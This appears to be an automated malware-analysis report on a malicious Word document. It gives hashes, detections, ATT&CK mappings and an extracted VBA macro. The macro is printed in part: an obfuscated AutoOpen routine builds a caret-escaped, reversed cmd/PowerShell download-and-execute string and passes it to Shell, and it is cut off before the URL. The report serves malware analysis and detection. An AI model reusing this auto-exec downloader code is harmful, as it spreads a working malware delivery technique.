Office (OLE) malware analysis — malicious · d4e7b9ae7c94a5ae

MALICIOUS

Office (OLE)

88.9 KB Created: 2018-09-21 18:53:00 Authoring application: Microsoft Office Word First seen: 2019-01-11

MD5: 3d2d85913e09f68e92e4fa31c67575d2 SHA-1: a50c1043314b8e4fa2b08d1b2f3e6cbe17124b71 SHA-256: d4e7b9ae7c94a5ae7cc64b9f4e162e1b258a71627372aa81bb2427b8f6058a7a

142 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a legacy WordBasic AutoOpen macro, which is a strong indicator of malicious intent. The AutoOpen macro calls the Shell function with a concatenated string, likely intended to download and execute a second-stage payload. ClamAV also detected this file as malware, specifically 'Doc.Malware.Valyria-6794593-0'.

Heuristics 5

ClamAV: Doc.Malware.Valyria-6794593-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Valyria-6794593-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10336 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10336 bytes
SHA-256: `09ad8c0489c3799f20d73715e717f8aa6dbc6a6852417428b57e7a06de58bb67`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ONFNUlnU" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim cMiScP(2) cMiScP(0) = MidB("wCKcT", 200, 533) cMiScP(1) = MidB("tvMcVmI", 534, 123) Dim bmidK(1) bmidK(0) = Right("kVjzD", 478) Dim SiaZa(2) SiaZa(0) = Right("NuGkPriA", 530) SiaZa(1) = Mid("nljkajo", 587, 255) Dim kUBrwI(1) kUBrwI(0) = MidB("pBrvcqT", 708, 460) Dim frokMi(1) frokMi(0) = Left("zXKMk", 651) lBhjuWFOwiw (KeyString(3 + 6 + 2 + 0 + 56) + UsodooiQdP + PNERi + iphCaorHWSr + YGNaQkDdLj + vzJXHFNkmsC) Dim GRPAdh(1) GRPAdh(0) = MidB("dSAJijEa", 649, 998) Dim QGQimm(1) QGQimm(0) = Right("qNzWWtkH", 902) Dim zYwllh(1) zYwllh(0) = Left("mAOUF", 798) End Sub Function lBhjuWFOwiw(FciQRYwYOP As String) Dim cIfCJf(2) cIfCJf(0) = Right("TbvvOwu", 382) cIfCJf(1) = MidB("PIEEkBE", 347, 308) Dim VdPcih(1) VdPcih(0) = MidB("TzhiR", 364, 926) Dim ECkTEC(1) ECkTEC(0) = MidB("dhcOlpz", 923, 33) Dim raQqcr(2) raQqcr(0) = MidB("PRmwB", 430, 292) raQqcr(1) = Mid("ozQjV", 144, 718) Dim tVCNDB(1) tVCNDB(0) = Left("rHAbE", 250) Shell@ FciQRYwYOP, CInt(msoBarTypeNormal) Dim njQZGj(1) njQZGj(0) = Left("HTiRjP", 177) Dim INviBd(2) INviBd(0) = MidB("bEzYfL", 213, 894) INviBd(1) = Left("FlaFAoc", 49) Dim RRfIo(1) RRfIo(0) = MidB("loBAQ", 872, 662) End Function Attribute VB_Name = "sXZqiKirpODr" Function UsodooiQdP() Dim lVtRWs(2) lVtRWs(0) = MidB("GhpRmVc", 776, 877) lVtRWs(1) = Mid("aFXsoz", 608, 296) Dim tEqXi(1) tEqXi(0) = MidB("vWjJNURA", 558, 175) Dim NNbwCn(2) NNbwCn(0) = Left("RQmwYOC", 594) NNbwCn(1) = Left("kCqSjtZ", 118) fTrqvVBAso = "md " + "/" + "V/C" + ChrW(3 + 0 + 3 + 5 + 23) + "s^" + "e^t " + "7^j" + "=^" + " ^ " Dim GoWPf(1) GoWPf(0) = MidB("kBdizC", 67, 757) Dim JZIvLp(1) JZIvLp(0) = Right("QaSRLTn", 420) Dim hdctW(2) hdctW(0) = Left("KdABzm", 998) hdctW(1) = Right("iSRQjzpu", 318) ijPWiXfN = "^" + " " + " " + "^ ^" + " ^ " + " ^ " + " ^ " Dim QuFFiN(2) QuFFiN(0) = Right("dwzLORPT", 867) QuFFiN(1) = Right("oECkEM", 375) Dim NvZiqM(2) NvZiqM(0) = Left("kWJoi", 747) NvZiqM(1) = Left("zRKok", 576) Dim XBXkcT(1) XBXkcT(0) = Mid("OhJjfTX", 351, 147) Dim mtCWpp(2) mtCWpp(0) = MidB("mMYohDP", 76, 358) mtCWpp(1) = Left("miPQV", 571) iLErVWlsv = "^ ^" + " ^}" + "}{^h" + "c^t^" + "ac" + "^}" + ";^k" + "aerb" Dim KiFzM(2) KiFzM(0) = Right("FmjqT", 748) KiFzM(1) = Left("mpzlw", 288) Dim mrPMI(1) mrPMI(0) = Right("YNnYSTK", 846) Dim jcqFmj(2) jcqFmj(0) = MidB("ChtCfUz", 406, 901) jcqFmj(1) = MidB("mikQC", 274, 123) Dim cCTrR(1) cCTrR(0) = Mid("aFiCh", 228, 238) cVoioUzAS = ";ld" + "d$ " + "m^e" + "^t^I" + "-^e" Dim EtdSQN(1) EtdSQN(0) = MidB("rOjjI", 275, 243) Dim IHXZd(2) IHXZd(0) = Mid("VjOjdVZE", 950, 645) IHXZd(1) = Left("BaiQibX", 506) Dim cjJrN(2) cjJrN(0) = Mid("CERNFXp", 586, 627) cjJrN(1) = MidB("whDEPwsi", 185, 400) Dim QQPrvL(1) QQPrvL(0) = Right("ZzcnX", 152) Dim qoOvRc(2) qoOvRc(0) = Mid("qENndrbh", 855, 136) qoOvRc(1) = MidB("zYjnG", 548, 549) jNspwzaMjNH = "ko" + "vnI" + "^;)l" + "dd" + "$ ," + "^" Dim zvqDA(2) zvqDA(0) = Left("rVGjic", 105) zvqDA(1) = Left("ODaXznBq", 32) Dim ZtChl(2) ZtChl(0) = Mid("brYsJW", 692, 561) ZtChl(1) = Mid("jLmXUXS", 924, 488) iVDTla = "a" + "w" + "S^" + "$" + "(e^" + "l^i^" + "F^da" + "^" + "o" + "^" + "l" Dim pwOHt(2) pwOHt(0) = Mid("pbUpoUQ", 130, 710) pwOHt(1) = Left("vEjquXD", 801) ApprsTlMaw = "n" + "w" + "^o^" + "D" + "^.^" + "a^" + "T^z" Dim pGzdij(2) pGzdij(0) = MidB("msKlPs", 887, 37) pGzdij(1) = Left("uXRGN", 738) Dim UWMJS(1) UWMJS(0) = Mid("YCPnzUXL", 186, 709) iwwzZG = "^$" + "{^yr" + "t{)^" + "j" + "lw" + "^$^ " UsodooiQdP = fTrqvVBAso + ijPWiXfN + iLErVWlsv + cVoioUzAS + jNspwzaMjNH + iVDTl ... (truncated)

SHA-256: 09ad8c0489c3799f20d73715e717f8aa6dbc6a6852417428b57e7a06de58bb67

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ONFNUlnU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim cMiScP(2)
cMiScP(0) = MidB("wCKcT", 200, 533)
cMiScP(1) = MidB("tvMcVmI", 534, 123)

   Dim bmidK(1)
bmidK(0) = Right("kVjzD", 478)

   Dim SiaZa(2)
SiaZa(0) = Right("NuGkPriA", 530)
SiaZa(1) = Mid("nljkajo", 587, 255)

   Dim kUBrwI(1)
kUBrwI(0) = MidB("pBrvcqT", 708, 460)

   Dim frokMi(1)
frokMi(0) = Left("zXKMk", 651)

lBhjuWFOwiw (KeyString(3 + 6 + 2 + 0 + 56) + UsodooiQdP + PNERi + iphCaorHWSr + YGNaQkDdLj + vzJXHFNkmsC)
   Dim GRPAdh(1)
GRPAdh(0) = MidB("dSAJijEa", 649, 998)

   Dim QGQimm(1)
QGQimm(0) = Right("qNzWWtkH", 902)

   Dim zYwllh(1)
zYwllh(0) = Left("mAOUF", 798)

End Sub
Function lBhjuWFOwiw(FciQRYwYOP As String)
   Dim cIfCJf(2)
cIfCJf(0) = Right("TbvvOwu", 382)
cIfCJf(1) = MidB("PIEEkBE", 347, 308)

   Dim VdPcih(1)
VdPcih(0) = MidB("TzhiR", 364, 926)

   Dim ECkTEC(1)
ECkTEC(0) = MidB("dhcOlpz", 923, 33)

   Dim raQqcr(2)
raQqcr(0) = MidB("PRmwB", 430, 292)
raQqcr(1) = Mid("ozQjV", 144, 718)

   Dim tVCNDB(1)
tVCNDB(0) = Left("rHAbE", 250)

Shell@ FciQRYwYOP, CInt(msoBarTypeNormal)
   Dim njQZGj(1)
njQZGj(0) = Left("HTiRjP", 177)

   Dim INviBd(2)
INviBd(0) = MidB("bEzYfL", 213, 894)
INviBd(1) = Left("FlaFAoc", 49)

   Dim RRfIo(1)
RRfIo(0) = MidB("loBAQ", 872, 662)

End Function

Attribute VB_Name = "sXZqiKirpODr"
Function UsodooiQdP()
Dim lVtRWs(2)
lVtRWs(0) = MidB("GhpRmVc", 776, 877)
lVtRWs(1) = Mid("aFXsoz", 608, 296)

   Dim tEqXi(1)
tEqXi(0) = MidB("vWjJNURA", 558, 175)

   Dim NNbwCn(2)
NNbwCn(0) = Left("RQmwYOC", 594)
NNbwCn(1) = Left("kCqSjtZ", 118)

fTrqvVBAso = "md " + "/" + "V/C" + ChrW(3 + 0 + 3 + 5 + 23) + "s^" + "e^t " + "7^j" + "=^" + " ^ "
Dim GoWPf(1)
GoWPf(0) = MidB("kBdizC", 67, 757)

   Dim JZIvLp(1)
JZIvLp(0) = Right("QaSRLTn", 420)

   Dim hdctW(2)
hdctW(0) = Left("KdABzm", 998)
hdctW(1) = Right("iSRQjzpu", 318)

ijPWiXfN = "^" + " " + " " + "^  ^" + "  ^ " + "  ^ " + " ^ "
Dim QuFFiN(2)
QuFFiN(0) = Right("dwzLORPT", 867)
QuFFiN(1) = Right("oECkEM", 375)

   Dim NvZiqM(2)
NvZiqM(0) = Left("kWJoi", 747)
NvZiqM(1) = Left("zRKok", 576)

   Dim XBXkcT(1)
XBXkcT(0) = Mid("OhJjfTX", 351, 147)

   Dim mtCWpp(2)
mtCWpp(0) = MidB("mMYohDP", 76, 358)
mtCWpp(1) = Left("miPQV", 571)

iLErVWlsv = "^  ^" + " ^}" + "}{^h" + "c^t^" + "ac" + "^}" + ";^k" + "aerb"
Dim KiFzM(2)
KiFzM(0) = Right("FmjqT", 748)
KiFzM(1) = Left("mpzlw", 288)

   Dim mrPMI(1)
mrPMI(0) = Right("YNnYSTK", 846)

   Dim jcqFmj(2)
jcqFmj(0) = MidB("ChtCfUz", 406, 901)
jcqFmj(1) = MidB("mikQC", 274, 123)

   Dim cCTrR(1)
cCTrR(0) = Mid("aFiCh", 228, 238)

cVoioUzAS = ";ld" + "d$ " + "m^e" + "^t^I" + "-^e"
Dim EtdSQN(1)
EtdSQN(0) = MidB("rOjjI", 275, 243)

   Dim IHXZd(2)
IHXZd(0) = Mid("VjOjdVZE", 950, 645)
IHXZd(1) = Left("BaiQibX", 506)

   Dim cjJrN(2)
cjJrN(0) = Mid("CERNFXp", 586, 627)
cjJrN(1) = MidB("whDEPwsi", 185, 400)

   Dim QQPrvL(1)
QQPrvL(0) = Right("ZzcnX", 152)

   Dim qoOvRc(2)
qoOvRc(0) = Mid("qENndrbh", 855, 136)
qoOvRc(1) = MidB("zYjnG", 548, 549)

jNspwzaMjNH = "ko" + "vnI" + "^;)l" + "dd" + "$ ," + "^"
Dim zvqDA(2)
zvqDA(0) = Left("rVGjic", 105)
zvqDA(1) = Left("ODaXznBq", 32)

   Dim ZtChl(2)
ZtChl(0) = Mid("brYsJW", 692, 561)
ZtChl(1) = Mid("jLmXUXS", 924, 488)

iVDTla = "a" + "w" + "S^" + "$" + "(e^" + "l^i^" + "F^da" + "^" + "o" + "^" + "l"
Dim pwOHt(2)
pwOHt(0) = Mid("pbUpoUQ", 130, 710)
pwOHt(1) = Left("vEjquXD", 801)

ApprsTlMaw = "n" + "w" + "^o^" + "D" + "^.^" + "a^" + "T^z"
Dim pGzdij(2)
pGzdij(0) = MidB("msKlPs", 887, 37)
pGzdij(1) = Left("uXRGN", 738)

   Dim UWMJS(1)
UWMJS(0) = Mid("YCPnzUXL", 186, 709)

iwwzZG = "^$" + "{^yr" + "t{)^" + "j" + "lw" + "^$^ "
UsodooiQdP = fTrqvVBAso + ijPWiXfN + iLErVWlsv + cVoioUzAS + jNspwzaMjNH + iVDTl
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.